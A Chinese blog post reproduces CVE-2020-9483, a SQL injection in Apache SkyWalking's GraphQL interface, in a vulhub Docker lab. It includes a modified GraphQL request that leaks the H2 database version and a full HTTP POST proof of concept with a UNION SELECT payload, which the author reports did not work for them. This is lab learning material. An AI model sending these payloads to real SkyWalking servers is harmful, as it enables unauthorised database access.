Apache-Skywalking-SQL注入(CVE-2020-9483)复现

已于 2022-04-18 21:10:09 修改
阅读量1.2k 收藏 1
点赞数
分类专栏: CVE 文章标签: docker
于 2021-10-08 17:18:19 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42558965/article/details/120655529
版权

漏洞描述
Apache SkyWalking 是一款应用性能监控(APM)工具,对微服务、云原生和容器化应用提供自动化、高性能的监控方案。当Apache SkyWalking使用H2 / MySQL / TiDB作为Apache SkyWalking存储时,通过GraphQL协议查询元数据时,存在SQL注入漏洞,该漏洞允许访问未指定的数据。 Apache SkyWalking 6.0.0到6.6.0、7.0.0 H2 / MySQL / TiDB存储实现不使用适当的方法来设置SQL参数。
影响版本
Apache SkyWalking 6.0.0 to 6.6.0, 7.0.0
实验工具:docker搭配vulhub-master,burpsuite、Firefox
漏洞复现
进入到/vulhub-master/skywalking/8.3.0-sqli文件夹下,创建所需环境

#docker-compose up -d

随后在物理机上访问你的 ip:端口号(默认8080),进入到Apache-Skywalking页面:
在这里插入图片描述
使用burpsuite抓包,抓取到的报如下:
在这里插入图片描述
修改数据包的请求体

{
    "query":"query queryLogs($condition: LogQueryCondition) {
  queryLogs(condition: $condition) {
    total
    logs {
      serviceId
      serviceName
      isError
      content
    }
  }
}
",
    "variables":{
        "condition":{
            "metricName":"sqli",
            "state":"ALL",
            "paging":{
                "pageSize":10
            }
        }
    }
}

如图提交POC之后爆出了h2的版本:
在这里插入图片描述
网络上很多都是使用另一种POC

POST /graphql HTTP/1.1
Host: ip:8080
Content-Type: application/json;charset=utf-8
Content-Length: 313
Connection: close

{"query":"query queryData($duration: Duration!) {globalP99: getLinearIntValues(metric: {name: \"all_p99\", id: \"') UNION ALL SELECT NULL,CONCAT('~', H2VERSION(), '~')--\" }, duration: $duration) {  values { value } }}","variables":{"duration":{"start":"2020-08-07 1417","end":"2020-08-07 1418","step":"MINUTE"}}}

但是我并未复现成功。

伟大灵魂导师
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Apache-Skywalking-SQL注入复现+利用(CVE-2020-9483)
0xSec
03-12 1331
Apache SkyWalking使用H2 / MySQL / TiDB作为Apache SkyWalking存储时,通过GraphQL协议查询元数据时,存在SQL注入漏洞,该漏洞允许访问未指定的数据。 Apache SkyWalking 6.0.0到6.6.0、7.0.0 H2 / MySQL / TiDB存储实现不使用适当的方法来设置SQL参数。
Apache SkyWalking SQL注入(CVE-2020-9483)
jammny
02-01 881
漏洞详情 当使用H2 / MySQL / TiDB作为Apache SkyWalking存储时,通过GraphQL协议查询元数据时,存在SQL注入漏洞,该漏洞允许访问未指定的数据。 Apache SkyWalking 6.0.0到6.6.0、7.0.0 H2 / MySQL / TiDB存储实现不使用适当的方法来设置SQL参数。 影响版本 Apache SkyWalking 6.0.0 to 6.6.0, 7.0.0 漏洞分析 漏洞利用 访问/graphql进行抓包,POST提交如下poc:
CVE-2020-9483 apache skywalking SQL注入漏洞
mirocky的博客
10-13 1298
当使用H2 / MySQL / TiDB作为Apache SkyWalking存储时,通过GraphQL协议查询元数据时,存在SQL注入漏洞,该漏洞允许访问未指定的数据。Apache SkyWalking 6.0.0到6.6.0、7.0.0 H2 / MySQL / TiDB存储实现不使用适当的方法来设置SQL参数。
Apache Skywalking <= 8.3 SQL注入(漏洞分析|snort规则编写)
weixin_68999845的博客
08-21 1125
Apache Skywalking
网络安全之SQL注入漏洞复现(中篇)(技术进阶)
最新发布
weixin_70911257的博客
04-21 1290
在我们手工注入时,我们应当根据实际情况判断用那种注入,以及要知道每一种注入方法的原理,手工注入固然慢,但是这才是灵魂所在,使用sqlmap工具虽然高效但是没有灵魂嘞。
Apache Skywalking 8.3.0 SQL注入漏洞
EC_Carrot的博客
07-28 753
漏洞简介 在Apache Skywalking 8.3.0版本及以前的GraphQL接口中,存在一处H2 Database SQL注入漏洞漏洞复现 参考了这位大佬的文章:https://www.linuxlz.com/aqld/2028.html 发送如下数据包即可查看数据库版本: POST /graphql HTTP/1.1 Host: localhost:8080 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mo
CVE-2020-9483Apache SkyWalking 存在的SQL注入漏洞复现
weixin_43923736的博客
06-02 1796
CVE-2020-9483Apache SkyWalking 存在的SQL注入漏洞复现
备忘: java使用graphql client,通过SkyWalking GraphQL数据接口查询Trace信息(复杂查询)
zhyuli的博客
12-26 1585
利用Java graql client 查询trace(复杂查询)
apache-skywalking-apm-8.5.0.tar.gz
01-03
这个压缩包 "apache-skywalking-apm-8.5.0.tar.gz" 包含了 Apache SkyWalking 8.5.0 版本的安装文件,用于在您的系统上部署和运行该监控平台。 SkyWalking 是一个强大的分布式追踪系统,能够帮助开发者对复杂分布式...
apache-skywalking-java-agent-8.9.0
05-21
在这个"apache-skywalking-java-agent-8.9.0"版本中,我们将探讨这个Java代理如何监控JVM服务,并深入理解其相关知识点。 1. **SkyWalking Java Agent**:SkyWalking的Java代理是一个自动探针,可以无侵入地附加到...
apache-skywalking-apm-es7-8.7.0.tar.gz
03-20
此压缩包 "apache-skywalking-apm-es7-8.7.0.tar.gz" 包含了针对 Elasticsearch 7.x 版本的 SkyWalking 平台的安装文件,版本为 8.7.0。Apache 标签表明了这是 Apache 软件基金会的一个项目。 SkyWalking 的核心...
SQLServer常用字段类型
01-08
本资料是一些SQLServer中常用字段类型
可供参考的compose.rar
07-11
apollo canal consul elasticsearch flask hadoop huzanbaseimage mongodb mongodb-single mongoexpress mysql mytest netcore portainer rabbitmq redis registry-ui sample skywalking spark sqlserver ssdb zookeeper
apache-skywalking-apm-es7-8.5.0.tar.gz
03-20
apache-skywalking-apm-es7-8.5.0.tar.gz
apache-skywalking-apm-es7-8.0.1.tar
07-29
skywalking es7 tar包。 apache-skywalking-apm-es7-8.0.1.tar
Apache SkyWalkingSql注入(cve-2020-9483)
鸣蜩十四的博客
09-27 1447
简介 Apache SkyWalking 是一款应用性能监控(APM)工具,对微服务、云原生和容器化应用提供自动化、高性能的监控方案。项目于 2015 年创建,并于 2017 年 12 月进入 Apache 孵化器。 Apache SkyWalking 提供了分布式追踪,服务网格(Service Mesh)遥感数据分析,指标聚合和可视化等多种能力。项目覆盖范围,从一个单纯的分布式追踪系统,扩展为一个可观测性分析平台(observability analysis platform)和应用性能监控管理系统。 漏
Apache SkyWalking SQL注入漏洞(CVE-2020-9483)复现
锋刃科技的博客
03-05 2257
简介 Apache Skywalking是一款针对分布式系统的应用程序性能监视工具,为微服务,云原生和基于容器(Docker,Kubernetes,Mesos)的体系结构而设计。 影响版本 Apache SkyWalking 6.0.0 to 6.6.0, 7.0.0 环境搭建 这里下载6.5.0进行搭建 下载地址 https://archive.apache.org/dist/skywalking/6.5.0/apache-skywalking-apm-6.5.0.ta...
Jeecg-Boot未授权SQL注入CVE-2023-1454
2301_81907423的博客
12-29 375
Win64;
Apache SkyWalking 监控 MySQL Server 实战
Huangjiazhen711的博客
09-19 1192
Apache SkyWalking 在本月初发布了 SkyWalking Backend、UI 的 9.2.0 版本 以及 SkyWalking Java Agent 8.12.0 版本,其中就有笔者贡献的 hutool-http client 5.x 插件,以后大家通过 hutool 工具发送的 http 请求也可以出现在分布式链路中了。另外,社区宣布计划在 2022 年 11 月 30 日结束所有 v8 版本,v9 可以在生产环境中提供稳定和更高性能的 APM,具体声明见SkyWalking 官网。
apache-skywalking-apm-es7-8.0.0.tar.gz下载
08-18
要下载apache-skywalking-apm-es7-8.0.0.tar.gz,你可以按照以下步骤进行操作: 第一步,打开你的网络浏览器,进入Apache SkyWalking的官方网站。 第二步,在网站上搜索或导航到下载页面。你可以在网站的顶部或...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值